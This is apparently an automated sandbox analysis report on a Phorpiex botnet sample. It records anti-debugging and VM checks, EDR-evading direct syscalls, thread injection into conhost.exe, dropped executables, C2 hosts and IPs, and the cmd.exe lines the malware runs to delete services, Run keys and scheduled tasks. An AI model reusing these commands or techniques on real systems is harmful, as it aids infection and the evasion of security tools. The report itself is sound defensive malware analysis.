    Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.LOG1.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
    Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI call chain: ExitProcess graph end nodegraph_1-4387
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI call chain: ExitProcess graph end nodegraph_1-4395
    Source: C:\Windows\sysludpvs.exeAPI call chain: ExitProcess graph end nodegraph_7-4421
    Source: C:\Windows\sysludpvs.exeAPI call chain: ExitProcess graph end nodegraph_7-4395
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00F81B48
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040A050 GetProcessHeaps,1_2_0040A050
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00F81B48
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeCode function: 5_2_007B1CA8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_007B1CA8
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeMemory allocated: C:\Windows\System32\conhost.exe base: 218E1C80000 protect: page execute and read and writeJump to behavior
    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeThread created: C:\Windows\System32\conhost.exe EIP: E1C80000Jump to behavior
    Found direct / indirect Syscall (likely to bypass EDR)
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtCreateThreadEx: Direct from: 0x401A17Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtWriteVirtualMemory: Direct from: 0x401D57Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtProtectVirtualMemory: Direct from: 0x401DD7Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtClose: Direct from: 0x401CD7
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtAllocateVirtualMemory: Direct from: 0x401D97Jump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeMemory written: C:\Windows\System32\conhost.exe base: 218E1C80000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /fJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "Windows Services" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /fJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: GetLocaleInfoA,strcmp,1_2_0040E8A0
    Source: C:\Windows\sysludpvs.exeCode function: GetLocaleInfoA,strcmp,2_2_0040E8A0
    Source: C:\Windows\sysludpvs.exeCode function: GetLocaleInfoA,strcmp,7_2_0040E8A0
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2052810334.exe VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeQueries volume information: C:\Users\user\AppData\Local\Temp\417928448.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2047112978.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeQueries volume information: C:\Users\user\AppData\Local\Temp\399630275.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2028814805.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeQueries volume information: C:\Users\user\AppData\Local\Temp\393932919.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1216017805.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeQueries volume information: C:\Users\user\AppData\Local\Temp\38822795.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeQueries volume information: C:\Users\user\AppData\Local\Temp\396820397.exe VolumeInformation
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81A78 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00F81A78
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

    Remote Access Functionality

    barindex
    Yara detected Phorpiex
    Source: Yara matchFile source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040D880
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040D880
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,7_2_00401470
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,7_2_00402020
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,7_2_0040D880
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,7_2_004013B0

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Native API    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		1
    Disable or Modify Tools    		11
    Input Capture    		1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		14
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Command and Scripting Interpreter    		1
    Windows Service    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		LSASS Memory1
    System Network Connections Discovery    		Remote Desktop Protocol11
    Input Capture    		2
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		1
    Windows Service    		1
    Obfuscated Files or Information    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin Shares3
    Clipboard Data    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Service Execution    		1
    Registry Run Keys / Startup Folder    		311
    Process Injection    		1
    DLL Side-Loading    		NTDS25
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
    Scheduled Task/Job    		121
    Masquerading    		LSA Secrets241
    Security Software Discovery    		SSHKeylogging23
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Registry Run Keys / Startup Folder    		1
    Modify Registry    		Cached Domain Credentials2
    Process Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
    Virtualization/Sandbox Evasion    		DCSync31
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
    Process Injection    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Hidden Files and Directories    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632967 Sample: a0RkmvhSaf.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 100 92 twizt.net 2->92 94 56.163.245.4.in-addr.arpa 2->94 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 7 other signatures 2->120 12 a0RkmvhSaf.exe 16 2->12         started        17 sysludpvs.exe 2->17         started        signatures3 process4 dnsIp5 102 twizt.net 185.215.113.66, 49709, 80 WHOLESALECONNECTIONSNL Portugal 12->102 88 C:\Users\user\AppData\Local\...\230053364.exe, PE32 12->88 dropped 90 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 12->90 dropped 148 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->148 19 230053364.exe 1 1 12->19         started        file6 signatures7 process8 file9 76 C:\Windows\sysludpvs.exe, PE32 19->76 dropped 122 Multi AV Scanner detection for dropped file 19->122 124 Found evasive API chain (may stop execution after checking mutex) 19->124 126 Contains functionality to check if Internet connection is working 19->126 128 3 other signatures 19->128 23 sysludpvs.exe 21 19->23         started        signatures10 process11 dnsIp12 96 95.142.87.201, 40500, 49683 TTL-ASTJ Tajikistan 23->96 98 146.70.53.161, 40500 TENET-1ZA United Kingdom 23->98 100 79 other IPs or domains 23->100 78 C:\Users\user\AppData\Local\...\152942395.exe, PE32 23->78 dropped 130 Multi AV Scanner detection for dropped file 23->130 132 Found evasive API chain (may stop execution after checking mutex) 23->132 134 Contains functionality to check if Internet connection is working 23->134 136 2 other signatures 23->136 28 152942395.exe 37 23->28         started        file13 signatures14 process15 file16 80 C:\Users\user\AppData\Local\...\634722489.exe, PE32+ 28->80 dropped 82 C:\Users\user\AppData\Local\...\417928448.exe, PE32+ 28->82 dropped 84 C:\Users\user\AppData\Local\...\399630275.exe, PE32+ 28->84 dropped 86 21 other malicious files 28->86 dropped 142 Antivirus detection for dropped file 28->142 144 Multi AV Scanner detection for dropped file 28->144 146 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->146 32 634722489.exe 28->32         started        35 2052810334.exe 2 28->35         started        37 2028814805.exe 28->37         started        39 7 other processes 28->39 signatures17 process18 signatures19 104 Multi AV Scanner detection for dropped file 32->104 106 Writes to foreign memory regions 32->106 108 Allocates memory in foreign processes 32->108 112 2 other signatures 32->112 41 conhost.exe 2 32->41         started        110 Antivirus detection for dropped file 35->110 43 cmd.exe 1 35->43         started        46 cmd.exe 37->46         started        48 cmd.exe 37->48         started        50 cmd.exe 39->50         started        52 cmd.exe 39->52         started        54 cmd.exe 39->54         started        56 5 other processes 39->56 process20 signatures21 58 WerFault.exe 23 16 41->58         started        138 Uses cmd line tools excessively to alter registry or file data 43->138 140 Uses schtasks.exe or at.exe to add and modify task schedules 43->140 60 conhost.exe 43->60         started        62 2 other processes 43->62 64 2 other processes 46->64 66 2 other processes 48->66 68 3 other processes 50->68 70 3 other processes 52->70 72 3 other processes 54->72 74 13 other processes 56->74 process22

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.